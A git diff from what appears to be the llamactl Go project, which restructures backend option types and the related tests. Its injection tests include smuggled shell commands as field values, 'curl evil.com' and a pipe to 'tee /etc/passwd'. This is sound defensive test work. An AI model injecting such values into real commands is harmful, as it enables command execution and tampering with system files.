56b8b3b..3a0651d 100644 --- a/pkg/manager/operations_test.go +++ b/pkg/manager/operations_test.go @@ -2,7 +2,6 @@ package manager_test import ( "llamactl/pkg/backends" - "llamactl/pkg/backends/llamacpp" "llamactl/pkg/config" "llamactl/pkg/instance" "llamactl/pkg/manager" @@ -14,10 +13,12 @@ func TestCreateInstance_Success(t *testing.T) { manager := createTestManager() options := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model.gguf", - Port: 8080, + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model.gguf", + Port: 8080, + }, }, } @@ -41,9 +42,11 @@ func TestCreateInstance_ValidationAndLimits(t *testing.T) { // Test duplicate names mngr := createTestManager() options := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model.gguf", + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, }, } @@ -97,9 +100,11 @@ func TestPortManagement(t *testing.T) { // Test auto port assignment options1 := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model.gguf", + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, }, } @@ -115,10 +120,12 @@ func TestPortManagement(t *testing.T) { // Test port conflict detection options2 := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model2.gguf", - Port: port1, // Same port - should conflict + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model2.gguf", + Port: port1, // Same port - should conflict + }, }, } @@ -133,10 +140,12 @@ func TestPortManagement(t *testing.T) { // Test port release on deletion specificPort := 8080 options3 := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model.gguf", - Port: specificPort, + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model.gguf", + Port: specificPort, + }, }, } @@ -161,9 +170,11 @@ func TestInstanceOperations(t *testing.T) { manager := createTestManager() options := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model.gguf", + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, }, } @@ -184,10 +195,12 @@ func TestInstanceOperations(t *testing.T) { // Update instance newOptions := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/new-model.gguf", - Port: 8081, + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/new-model.gguf", + Port: 8081, + }, }, } @@ -195,8 +208,8 @@ func TestInstanceOperations(t *testing.T) { if err != nil { t.Fatalf("UpdateInstance failed: %v", err) } - if updated.GetOptions().LlamaServerOptions.Model != "/path/to/new-model.gguf" { - t.Errorf("Expected model '/path/to/new-model.gguf', got %q", updated.GetOptions().LlamaServerOptions.Model) + if updated.GetOptions().BackendOptions.LlamaServerOptions.Model != "/path/to/new-model.gguf" { + t.Errorf("Expected model '/path/to/new-model.gguf', got %q", updated.GetOptions().BackendOptions.LlamaServerOptions.Model) } // List instances diff --git a/pkg/manager/timeout_test.go b/pkg/manager/timeout_test.go index 8c30d5d..d1c3a47 100644 --- a/pkg/manager/timeout_test.go +++ b/pkg/manager/timeout_test.go @@ -2,7 +2,6 @@ package manager_test import ( "llamactl/pkg/backends" - "llamactl/pkg/backends/llamacpp" "llamactl/pkg/config" "llamactl/pkg/instance" "llamactl/pkg/manager" @@ -36,9 +35,11 @@ func TestTimeoutFunctionality(t *testing.T) { idleTimeout := 1 // 1 minute options := &instance.Options{ IdleTimeout: &idleTimeout, - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model.gguf", + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, }, } @@ -85,9 +86,11 @@ func TestTimeoutFunctionality(t *testing.T) { // Test that instance without timeout doesn't timeout noTimeoutOptions := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model.gguf", + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, }, // No IdleTimeout set } @@ -116,25 +119,31 @@ func TestEvictLRUInstance_Success(t *testing.T) { // Create 3 instances with idle timeout enabled (value doesn't matter for LRU logic) options1 := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model1.gguf", - }, IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0 + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model1.gguf", + }, + }, } options2 := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model2.gguf", - }, IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0 + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model2.gguf", + }, + }, } options3 := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model3.gguf", - }, IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0 + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model3.gguf", + }, + }, } inst1, err := manager.CreateInstance("instance-1", options1) @@ -198,11 +207,13 @@ func TestEvictLRUInstance_NoEligibleInstances(t *testing.T) { // Helper function to create instances with different timeout configurations createInstanceWithTimeout := func(manager manager.InstanceManager, name, model string, timeout *int) *instance.Instance { options := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: model, - }, IdleTimeout: timeout, + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: model, + }, + }, } inst, err := manager.CreateInstance(name, options) if err != nil { diff --git a/pkg/server/handlers_backends.go b/pkg/server/handlers_backends.go index 6fa833c..1ae2835 100644 --- a/pkg/server/handlers_backends.go +++ b/pkg/server/handlers_backends.go @@ -4,9 +4,6 @@ import ( "encoding/json" "fmt" "llamactl/pkg/backends" - "llamactl/pkg/backends/llamacpp" - "llamactl/pkg/backends/mlx" - "llamactl/pkg/backends/vllm" "llamactl/pkg/instance" "net/http" "os/exec" @@ -43,7 +40,7 @@ func (h *Handler) LlamaCppProxy(onDemandStart bool) http.HandlerFunc { return } - if options.BackendType != backends.BackendTypeLlamaCpp { + if options.BackendOptions.BackendType != backends.BackendTypeLlamaCpp { http.Error(w, "Instance is not a llama.cpp server.", http.StatusBadRequest) return } @@ -130,14 +127,16 @@ func (h *Handler) ParseLlamaCommand() http.HandlerFunc { writeError(w, http.StatusBadRequest, "invalid_command", "Command cannot be empty") return } - llamaOptions, err := llamacpp.ParseLlamaCommand(req.Command) + llamaOptions, err := backends.ParseLlamaCommand(req.Command) if err != nil { writeError(w, http.StatusBadRequest, "parse_error", err.Error()) return } options := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: llamaOptions, + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: llamaOptions, + }, } w.Header().Set("Content-Type", "application/json") if err := json.NewEncoder(w).Encode(options); err != nil { @@ -179,7 +178,7 @@ func (h *Handler) ParseMlxCommand() http.HandlerFunc { return } - mlxOptions, err := mlx.ParseMlxCommand(req.Command) + mlxOptions, err := backends.ParseMlxCommand(req.Command) if err != nil { writeError(w, http.StatusBadRequest, "parse_error", err.Error()) return @@ -189,8 +188,10 @@ func (h *Handler) ParseMlxCommand() http.HandlerFunc { backendType := backends.BackendTypeMlxLm options := &instance.Options{ - BackendType: backendType, - MlxServerOptions: mlxOptions, + BackendOptions: backends.Options{ + BackendType: backendType, + MlxServerOptions: mlxOptions, + }, } w.Header().Set("Content-Type", "application/json") @@ -233,7 +234,7 @@ func (h *Handler) ParseVllmCommand() http.HandlerFunc { return } - vllmOptions, err := vllm.ParseVllmCommand(req.Command) + vllmOptions, err := backends.ParseVllmCommand(req.Command) if err != nil { writeError(w, http.StatusBadRequest, "parse_error", err.Error()) return @@ -242,8 +243,10 @@ func (h *Handler) ParseVllmCommand() http.HandlerFunc { backendType := backends.BackendTypeVllm options := &instance.Options{ - BackendType: backendType, - VllmServerOptions: vllmOptions, + BackendOptions: backends.Options{ + BackendType: backendType, + VllmServerOptions: vllmOptions, + }, } w.Header().Set("Content-Type", "application/json") diff --git a/pkg/testutil/helpers.go b/pkg/testutil/helpers.go index 7b7fe0c..73c83c5 100644 --- a/pkg/testutil/helpers.go +++ b/pkg/testutil/helpers.go @@ -1,5 +1,7 @@ package testutil +import "slices" + // Helper functions for pointer fields func BoolPtr(b bool) *bool { return &b @@ -8,3 +10,23 @@ func BoolPtr(b bool) *bool { func IntPtr(i int) *int { return &i } + +// Helper functions for testing command arguments + +// Contains checks if a slice contains a specific item +func Contains(slice []string, item string) bool { + return slices.Contains(slice, item) +} + +// ContainsFlagWithValue checks if args contains a flag followed by a specific value +func ContainsFlagWithValue(args []string, flag, value string) bool { + for i, arg := range args { + if arg == flag { + // Check if there's a next argument and it matches the expected value + if i+1 < len(args) && args[i+1] == value { + return true + } + } + } + return false +} diff --git a/pkg/validation/validation.go b/pkg/validation/validation.go index 6d6638d..ca7b8ec 100644 --- a/pkg/validation/validation.go +++ b/pkg/validation/validation.go @@ -2,8 +2,6 @@ package validation import ( "fmt" - "llamactl/pkg/backends" - "llamactl/pkg/instance" "reflect" "regexp" ) @@ -24,8 +22,8 @@ var ( type ValidationError error -// validateStringForInjection checks if a string contains dangerous patterns -func validateStringForInjection(value string) error { +// ValidateStringForInjection checks if a string contains dangerous patterns +func ValidateStringForInjection(value string) error { for _, pattern := range dangerousPatterns { if pattern.MatchString(value) { return ValidationError(fmt.Errorf("value contains potentially dangerous characters: %s", value)) @@ -34,83 +32,8 @@ func validateStringForInjection(value string) error { return nil } -// ValidateInstanceOptions performs validation based on backend type -func ValidateInstanceOptions(options *instance.Options) error { - if options == nil { - return ValidationError(fmt.Errorf("options cannot be nil")) - } - - // Validate based on backend type - switch options.BackendType { - case backends.BackendTypeLlamaCpp: - return validateLlamaCppOptions(options) - case backends.BackendTypeMlxLm: - return validateMlxOptions(options) - case backends.BackendTypeVllm: - return validateVllmOptions(options) - default: - return ValidationError(fmt.Errorf("unsupported backend type: %s", options.BackendType)) - } -} - -// validateLlamaCppOptions validates llama.cpp specific options -func validateLlamaCppOptions(options *instance.Options) error { - if options.LlamaServerOptions == nil { - return ValidationError(fmt.Errorf("llama server options cannot be nil for llama.cpp backend")) - } - - // Use reflection to check all string fields for injection patterns - if err := validateStructStrings(options.LlamaServerOptions, ""); err != nil { - return err - } - - // Basic network validation for port - if options.LlamaServerOptions.Port < 0 || options.LlamaServerOptions.Port > 65535 { - return ValidationError(fmt.Errorf("invalid port range: %d", options.LlamaServerOptions.Port)) - } - - return nil -} - -// validateMlxOptions validates MLX backend specific options -func validateMlxOptions(options *instance.Options) error { - if options.MlxServerOptions == nil { - return ValidationError(fmt.Errorf("MLX server options cannot be nil for MLX backend")) - } - - if err := validateStructStrings(options.MlxServerOptions, ""); err != nil { - return err - } - - // Basic network validation for port - if options.MlxServerOptions.Port < 0 || options.MlxServerOptions.Port > 65535 { - return ValidationError(fmt.Errorf("invalid port range: %d", options.MlxServerOptions.Port)) - } - - return nil -} - -// validateVllmOptions validates vLLM backend specific options -func validateVllmOptions(options *instance.Options) error { - if options.VllmServerOptions == nil { - return ValidationError(fmt.Errorf("vLLM server options cannot be nil for vLLM backend")) - } - - // Use reflection to check all string fields for injection patterns - if err := validateStructStrings(options.VllmServerOptions, ""); err != nil { - return err - } - - // Basic network validation for port - if options.VllmServerOptions.Port < 0 || options.VllmServerOptions.Port > 65535 { - return ValidationError(fmt.Errorf("invalid port range: %d", options.VllmServerOptions.Port)) - } - - return nil -} - -// validateStructStrings recursively validates all string fields in a struct -func validateStructStrings(v any, fieldPath string) error { +// ValidateStructStrings recursively validates all string fields in a struct +func ValidateStructStrings(v any, fieldPath string) error { val := reflect.ValueOf(v) if val.Kind() == reflect.Ptr { val = val.Elem() @@ -136,21 +59,21 @@ func validateStructStrings(v any, fieldPath string) error { switch field.Kind() { case reflect.String: - if err := validateStringForInjection(field.String()); err != nil { + if err := ValidateStringForInjection(field.String()); err != nil { return ValidationError(fmt.Errorf("field %s: %w", fieldName, err)) } case reflect.Slice: if field.Type().Elem().Kind() == reflect.String { for j := 0; j < field.Len(); j++ { - if err := validateStringForInjection(field.Index(j).String()); err != nil { + if err := ValidateStringForInjection(field.Index(j).String()); err != nil { return ValidationError(fmt.Errorf("field %s[%d]: %w", fieldName, j, err)) } } } case reflect.Struct: - if err := validateStructStrings(field.Interface(), fieldName); err != nil { + if err := ValidateStructStrings(field.Interface(), fieldName); err != nil { return err } } diff --git a/pkg/validation/validation_test.go b/pkg/validation/validation_test.go index 759ebc3..e447666 100644 --- a/pkg/validation/validation_test.go +++ b/pkg/validation/validation_test.go @@ -2,9 +2,6 @@ package validation_test import ( "llamactl/pkg/backends" - "llamactl/pkg/backends/llamacpp" - "llamactl/pkg/instance" - "llamactl/pkg/testutil" "llamactl/pkg/validation" "strings" "testing" @@ -58,13 +55,11 @@ func TestValidateInstanceName(t *testing.T) { } func TestValidateInstanceOptions_NilOptions(t *testing.T) { - err := validation.ValidateInstanceOptions(nil) + var opts backends.Options + err := opts.ValidateInstanceOptions() if err == nil { t.Error("Expected error for nil options") } - if !strings.Contains(err.Error(), "options cannot be nil") { - t.Errorf("Expected 'options cannot be nil' error, got: %v", err) - } } func TestValidateInstanceOptions_PortValidation(t *testing.T) { @@ -83,14 +78,14 @@ func TestValidateInstanceOptions_PortValidation(t *testing.T) { for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { - options := &instance.Options{ + options := backends.Options{ BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ + LlamaServerOptions: &backends.LlamaServerOptions{ Port: tt.port, }, } - err := validation.ValidateInstanceOptions(options) + err := options.ValidateInstanceOptions() if (err != nil) != tt.wantErr { t.Errorf("ValidateInstanceOptions(port=%d) error = %v, wantErr %v", tt.port, err, tt.wantErr) } @@ -137,14 +132,14 @@ func TestValidateInstanceOptions_StringInjection(t *testing.T) { for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { // Test with Model field (string field) - options := &instance.Options{ + options := backends.Options{ BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ + LlamaServerOptions: &backends.LlamaServerOptions{ Model: tt.value, }, } - err := validation.ValidateInstanceOptions(options) + err := options.ValidateInstanceOptions() if (err != nil) != tt.wantErr { t.Errorf("ValidateInstanceOptions(model=%q) error = %v, wantErr %v", tt.value, err, tt.wantErr) } @@ -175,14 +170,14 @@ func TestValidateInstanceOptions_ArrayInjection(t *testing.T) { for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { // Test with Lora field (array field) - options := &instance.Options{ + options := backends.Options{ BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ + LlamaServerOptions: &backends.LlamaServerOptions{ Lora: tt.array, }, } - err := validation.ValidateInstanceOptions(options) + err := options.ValidateInstanceOptions() if (err != nil) != tt.wantErr { t.Errorf("ValidateInstanceOptions(lora=%v) error = %v, wantErr %v", tt.array, err, tt.wantErr) } @@ -194,14 +189,14 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) { // Test that injection in any field is caught tests := []struct { name string - options *instance.Options + options backends.Options wantErr bool }{ { name: "injection in model field", - options: &instance.Options{ + options: backends.Options{ BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ + LlamaServerOptions: &backends.LlamaServerOptions{ Model: "safe.gguf", HFRepo: "microsoft/model; curl evil.com", }, @@ -210,9 +205,9 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) { }, { name: "injection in log file", - options: &instance.Options{ + options: backends.Options{ BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ + LlamaServerOptions: &backends.LlamaServerOptions{ Model: "safe.gguf", LogFile: "/tmp/log.txt | tee /etc/passwd", }, @@ -221,9 +216,9 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) { }, { name: "all safe fields", - options: &instance.Options{ + options: backends.Options{ BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ + LlamaServerOptions: &backends.LlamaServerOptions{ Model: "/path/to/model.gguf", HFRepo: "microsoft/DialoGPT-medium", LogFile: "/tmp/llama.log", @@ -237,7 +232,7 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) { for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { - err := validation.ValidateInstanceOptions(tt.options) + err := tt.options.ValidateInstanceOptions() if (err != nil) != tt.wantErr { t.Errorf("ValidateInstanceOptions() error = %v, wantErr %v", err, tt.wantErr) } @@ -247,12 +242,9 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) { func TestValidateInstanceOptions_NonStringFields(t *testing.T) { // Test that non-string fields don't interfere with validation - options := &instance.Options{ - AutoRestart: testutil.BoolPtr(true), - MaxRestarts: testutil.IntPtr(5), - RestartDelay: testutil.IntPtr(10), - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ + options := backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ Port: 8080, GPULayers: 32, CtxSize: 4096, @@ -264,7 +256,7 @@ func TestValidateInstanceOptions_NonStringFields(t *testing.T) { }, } - err := validation.ValidateInstanceOptions(options) + err := options.ValidateInstanceOptions() if err != nil { t.Errorf("ValidateInstanceOptions with non-string fields should not error, got: %v", err) }